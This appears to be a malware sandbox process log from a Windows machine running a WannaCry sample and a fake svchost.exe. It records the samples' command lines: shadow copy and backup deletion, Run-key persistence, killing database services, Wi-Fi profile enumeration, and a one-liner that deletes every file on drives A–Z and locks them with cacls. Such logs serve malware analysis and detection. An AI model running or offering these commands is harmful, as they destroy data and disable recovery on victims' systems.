C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1776,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1772 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2032,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2084 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2196,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2228 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3152 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3256 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4468,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4480 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4516,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4676 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4460,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4772 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4276,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4984 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5088,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4868 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4992,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4824 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3368,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3288 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4636,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5132 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 148061716741768.bat
C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\Desktop\@[email protected]
"C:\Users\Admin\Desktop\@[email protected]"
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "waznenvck896" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "waznenvck896" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=3312,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=872 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5620,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4828 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5632,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5584 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5860,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5876 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=3424,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5580 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5168,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3448 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DevicesFlow -s DevicesFlowUserSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5812,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5556 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5568,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5764 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3480,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4412 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3236,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=6028 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3456,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3252 /prefetch:8
C:\Users\Admin\Downloads\svchost.exe
"C:\Users\Admin\Downloads\svchost.exe"
C:\Users\Admin\Downloads\svchost.exe
"C:\Users\Admin\Downloads\svchost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s svchost.exe
C:\Windows\system32\attrib.exe
attrib +h +s svchost.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c timeout 1 & echo Installing... & echo Installing... & echo Installing... & echo Installing... & echo Installing... & echo Installing... & del A:\*.* /f /s /q & cacls A:\ /e /p everyone:n & del B:\*.* /f /s /q & cacls B:\ /e /p everyone:n & del D:\*.* /f /s /q & cacls D:\ /e /p everyone:n & del E:\*.* /f /s /q & cacls E:\ /e /p everyone:n & del F:\*.* /f /s /q & cacls F:\ /e /p everyone:n & del G:\*.* /f /s /q & cacls G:\ /e /p everyone:n & del H:\*.* /f /s /q & cacls H:\ /e /p everyone:n & del I:\*.* /f /s /q & cacls I:\ /e /p everyone:n & del J:\*.* /f /s /q & cacls J:\ /e /p everyone:n & del K:\*.* /f /s /q & cacls K:\ /e /p everyone:n & del L:\*.* /f /s /q & cacls L:\ /e /p everyone:n & del M:\*.* /f /s /q & cacls M:\ /e /p everyone:n & del N:\*.* /f /s /q & cacls N:\ /e /p everyone:n & del O:\*.* /f /s /q & cacls O:\ /e /p everyone:n & del P:\*.* /f /s /q & cacls P:\ /e /p everyone:n & del Q:\*.* /f /s /q & cacls Q:\ /e /p everyone:n & del R:\*.* /f /s /q & cacls R:\ /e /p everyone:n & del S:\*.* /f /s /q & cacls S:\ /e /p everyone:n & del T:\*.* /f /s /q & cacls T:\ /e /p everyone:n & del U:\*.* /f /s /q & cacls U:\ /e /p everyone:n & del V:\*.* /f /s /q & cacls V:\ /e /p everyone:n & del W:\*.* /f /s /q & cacls W:\ /e /p everyone:n & del X:\*.* /f /s /q & cacls X:\ /e /p everyone:n & del Y:\*.* /f /s /q & cacls Y:\ /e /p everyone:n & del Z:\*.* /f /s /q & cacls Z:\ /e /p everyone:n & del C:\*.* /f /s /q & cacls C:\ /e /p everyone:n
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cacls.exe
cacls A:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls B:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls D:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls E:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls F:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls G:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls H:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls I:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls J:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls K:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls L:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls M:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls N:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls O:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls P:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls Q:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls R:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls S:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls T:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls U:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls V:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls W:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls X:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls Y:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls Z:\ /e /p everyone:n
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff815ae3cb8,0x7ff815ae3cc8,0x7ff815ae3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,14521357648390314086,1187727766287627497,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2020 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,14521357648390314086,1187727766287627497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,14521357648390314086,1187727766287627497,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2556 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,14521357648390314086,1187727766287627497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,14521357648390314086,1187727766287627497,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,14521357648390314086,1187727766287627497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,14521357648390314086,1187727766287627497,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
C:\Windows\system32\cacls.exe
cacls C:\ /e /p everyone:n
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
C:\Users\Admin\Desktop\@[email protected]
"C:\Users\Admin\Desktop\@[email protected]"
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im Microsoft.Exchange.*
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im MSExchange*
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im sqlserver.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im sqlwriter.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im mysqld.exe
C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5556,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3756 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=2160,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=6228 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3756,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3388 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5796,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5328 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=5900,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4732 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=6148,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=6220 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=2720,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5964 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
